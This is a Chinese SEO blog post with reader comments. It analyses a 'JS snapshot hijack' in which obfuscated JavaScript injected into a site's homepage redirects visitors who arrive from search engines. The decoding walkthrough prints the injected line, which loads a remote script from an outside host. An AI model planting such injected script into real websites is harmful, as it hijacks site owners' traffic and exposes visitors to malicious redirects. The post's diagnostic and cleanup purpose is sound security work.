网站JS快照被劫持恢复诊断教程

站长们经常遇到js快照劫持的问题,对网站的优化带来及大的影响。对于大多数新手站长来说js快照劫持,束手无策。今天无忧老师为大家进行一轮深度的解析。

网站安全攻击

一,js快照劫持示例

js快照劫持演示图,记录了是网站跳转的。

一个是百度搜索快照劫持演示。另一个是搜狐搜索快照劫持演示。

JS快照劫持动画
JS快照劫持,百度搜索演示图
JS劫持
JS快照劫持,搜狐搜索演示图

 

二,分析js快照劫持代码

经分析,网站首页被植入了恶意了代码,而且是多次加密JS代码。

JS代码断

此段代码就是添加在网站首页的JS,而且属于了加密了的代码,一般看不出什么猫腻。

三,加密JS层层分析

接下来进行JS反向解析分析。可以使用站长工具在线分析:http://tool.chinaz.com/js.aspx

站长工具JS混淆加密压缩 截图
站长工具JS混淆加密压缩 截图

解析后,可以看到真面目,这段代码。

< script type = "text/javascript" >
document.writeln("<script src=http://www.5121188.com/main2.js></script>"); < /script>

打开这个main2.js可以看到一段落代码。

JS恶意代码加密
JS恶意代码二次加密

攻击者真的多有精力,层层加密啊。怪不得一般站长根本无法发现。

然后再进行解密。

被加密的JS恶意代码解析图
被加密的JS恶意代码解析图

这下大家应该清楚了,攻击者对代码进行了3次的加密再调用,来实现百度快照的JS劫持跳转。

 

四,网站安全建议

网站安全一直是一个让站长运营者头痛的问题,没有百分百安全的网站,只有一断的进行维护和优化,做到定期备份,定期检查,最大程度的杜绝网站被黑被劫持的风险。希望各位站长清楚并且牢记在心。

如果想要?我把整个JS快照劫持代码分析给大家,关注微信wuyouseo获取。

 

最后,在我的课程中也经常会分享一些网站安全小知识,请大家一定关注我的SEO博客www.ainiseo.com和微信公众号wuyousem,不断的分析干货教程和文章。

 

文章由SEO技术博客 无忧老师分享,转载请注明出处。https://www.ainiseo.com/ 感谢你的阅读。

本站文章由SEO技术博客撰稿人原创,作者:无 忧创作,如若转载请注明原文及出处:https://www.ainiseo.com/jishu/2270.html

(5)
打赏 微信扫一扫 微信扫一扫 支付宝扫一扫 支付宝扫一扫
上一篇 2017年9月6日 下午10:39
下一篇 2017年9月14日 下午2:28

相关文章推荐

发表回复

您的电子邮箱地址不会被公开。 必填项已用*标注

评论列表(6条)

  • 阿里云
    阿里云 2018年11月12日 下午5:08

    快照劫持就是你在百度搜索关键词出现的结果排名的快照内容不是你网站的内容,而是一些不良信息,关于bocai类等的,那么就是你的网站中招了。那么他们是怎么做到的呢?这个肯定就是你网站程序有漏洞,让黑客技术人员找到后门进入你的网站进行篡改的,他们篡改的时间一般是晚上凌晨以后,这样在百度搜索引擎蜘蛛抓取你的快照的时候就是他们篡改的内容被抓取到了,然后又神不知鬼不觉的又把你原来的TDK换回来了。这样你就会发现你的网站什么都没有变化,但是你的快照内容发生了更改,这个时候你就是丈二的和尚了。
    打开首页文件,找到文件顶部title标签的部分看看有无被加密的代码,然后清除掉,然后重新上传(如果全站被黑,那就只有彻底清除了),如果清理代码过后没过多久还是被反复篡改的话,应该对网站的源码以及文件进行检查,清除掉恶意链接。如果技术不够,无法准确判断的话,可以直接找专业的网站安全公司来处理解决,国内SINE安全、绿盟、启明星辰都是比较有名的安全公司

    • 无 忧
      无 忧 2018年11月16日 下午4:48

      @阿里云是的,理解的非常到位,不亏是大神留言。

  • 百度安全中心
    百度安全中心 2018年6月30日 下午4:36

    网站快照被劫持跳转 首先看首页代码有无被篡改 ,看你的图片情况 应该是存在隐藏性质的脚本木马,建议联系专业做安全的公司来深入进行全面的代码审计以及漏洞检测和修补,国内推荐找Sinesafe以及绿盟和启蒙星辰。

  • 百度安全中心
    百度安全中心 2018年6月30日 下午4:34

    网站快照被劫持跳转 首先看首页代码有无被篡改 ,看你的图片情况 应该是存在隐藏性质的脚本木马,建议联系专业做安全的公司来深入进行全面的代码审计以及漏洞检测和修补,国内推荐找Sinesafe以及绿盟和启蒙星辰。

  • 英国论文网
    英国论文网 2017年9月15日 下午3:17

    需要三次解密吗

  • 夏日博客
    夏日博客 2017年9月13日 下午3:34

    以前遇到过这种情况,真的好恶心。

联系我

由于平时工作忙:流量合作还是咨询SEO服务,请简明扼表明来意!谢谢!

在线咨询:点击这里给我发消息

邮件:wuyouseo@gmail.com 合作微信:wuyoublog

工作时间:周一至周六,9:30-22:30,节假日休息

个人微信
个人微信
分享本页
返回顶部